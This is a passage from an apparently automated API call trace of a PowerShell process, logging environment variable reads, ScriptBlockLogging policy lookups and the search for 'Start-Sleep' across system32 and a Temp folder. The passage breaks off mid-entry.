0x4 [0263.673] Release () returned 0x3 [0263.678] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0 [0263.696] GenericStreamBase::Write () returned 0x0 [0263.696] GenericStreamBase::Write () returned 0x0 [0263.696] CoCreateGuid (in: pguid=0x7ffb09cf5390 | out: pguid=0x7ffb09cf5390*(Data1=0xf992c27c, Data2=0x4f91, Data3=0x4c46, Data4=([0]=0xbd, [1]=0x20, [2]=0x43, [3]=0xec, [4]=0xf1, [5]=0x7e, [6]=0x58, [7]=0x6d))) returned 0x0 [0263.696] GenericStreamBase::Write () returned 0x0 [0263.698] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0263.698] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x3 [0263.698] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0263.698] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0263.698] Release () returned 0x3 [0263.698] CoGetContextToken (in: pToken=0x1b81c930 | out: pToken=0x1b81c930) returned 0x0 [0263.698] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0263.699] WindowsCreateString () returned 0x0 [0263.699] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x4 [0263.699] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3 [0263.700] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0 [0263.961] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b81ee40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0264.006] EtwEventActivityIdControl () returned 0x0 [0264.006] EtwEventActivityIdControl () returned 0x0 [0264.006] EtwEventActivityIdControl () returned 0x0 [0264.010] EtwEventActivityIdControl () returned 0x0 [0264.010] EtwEventActivityIdControl () returned 0x0 [0264.010] EtwEventActivityIdControl () returned 0x0 [0264.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b81dd80, nSize=0x80 | out: lpBuffer="") returned 0x0 [0264.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b81dd80, nSize=0x80 | out: lpBuffer="") returned 0x0 [0264.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b81dde0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0264.157] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81eec8 | out: phkResult=0x1b81eec8*=0x0) returned 0x2 [0264.157] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b81eec8 | out: phkResult=0x1b81eec8*=0x0) returned 0x2 [0264.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b81dd30, nSize=0x80 | out: lpBuffer="") returned 0x0 [0264.168] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b81e860, nSize=0x80 | out: lpBuffer="") returned 0x0 [0264.171] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b81e660, nSize=0x80 | out: lpBuffer="") returned 0x3a [0264.171] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b81e610, nSize=0x80 | out: lpBuffer="") returned 0x3a [0264.172] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b81e680, nSize=0x80 | out: lpBuffer="") returned 0x63 [0264.186] CoTaskMemAlloc (cb=0x20e) returned 0x540310 [0264.186] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x540310 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x24 [0264.186] CoTaskMemFree (pv=0x540310) [0264.186] CoTaskMemAlloc (cb=0x20e) returned 0x540310 [0264.186] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x540310, cchBuffer=0x105 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.188] CoTaskMemFree (pv=0x540310) [0264.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.192] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x23 [0264.194] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0264.195] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.195] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.197] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.ps1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.200] CoTaskMemAlloc (cb=0x20e) returned 0x540310 [0264.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x540310, nSize=0x105 | out: lpBuffer="") returned 0x0 [0264.200] CoTaskMemFree (pv=0x540310) [0264.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.200] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.200] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x24 [0264.200] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0264.200] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.201] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.201] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psm1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.244] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x24 [0264.245] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0264.245] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.245] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.261] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.psd1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.261] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.COM", lpFilePart=0x0) returned 0x23 [0264.261] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0264.261] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.261] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.262] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.COM", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.263] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x23 [0264.263] GetFullPathNameW (in: lpFileName="Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x34 [0264.263] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.263] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.264] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.EXE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.264] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.265] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.265] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x23 [0264.265] GetFullPathNameW (in: lpFileName="Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x34 [0264.265] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.265] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.266] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.BAT", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.266] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x23 [0264.267] GetFullPathNameW (in: lpFileName="Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x34 [0264.267] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.267] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.268] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CMD", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.268] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0264.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0264.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x23 [0264.269] GetFullPathNameW (in: lpFileName="Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x34 [0264.269] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.269] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: 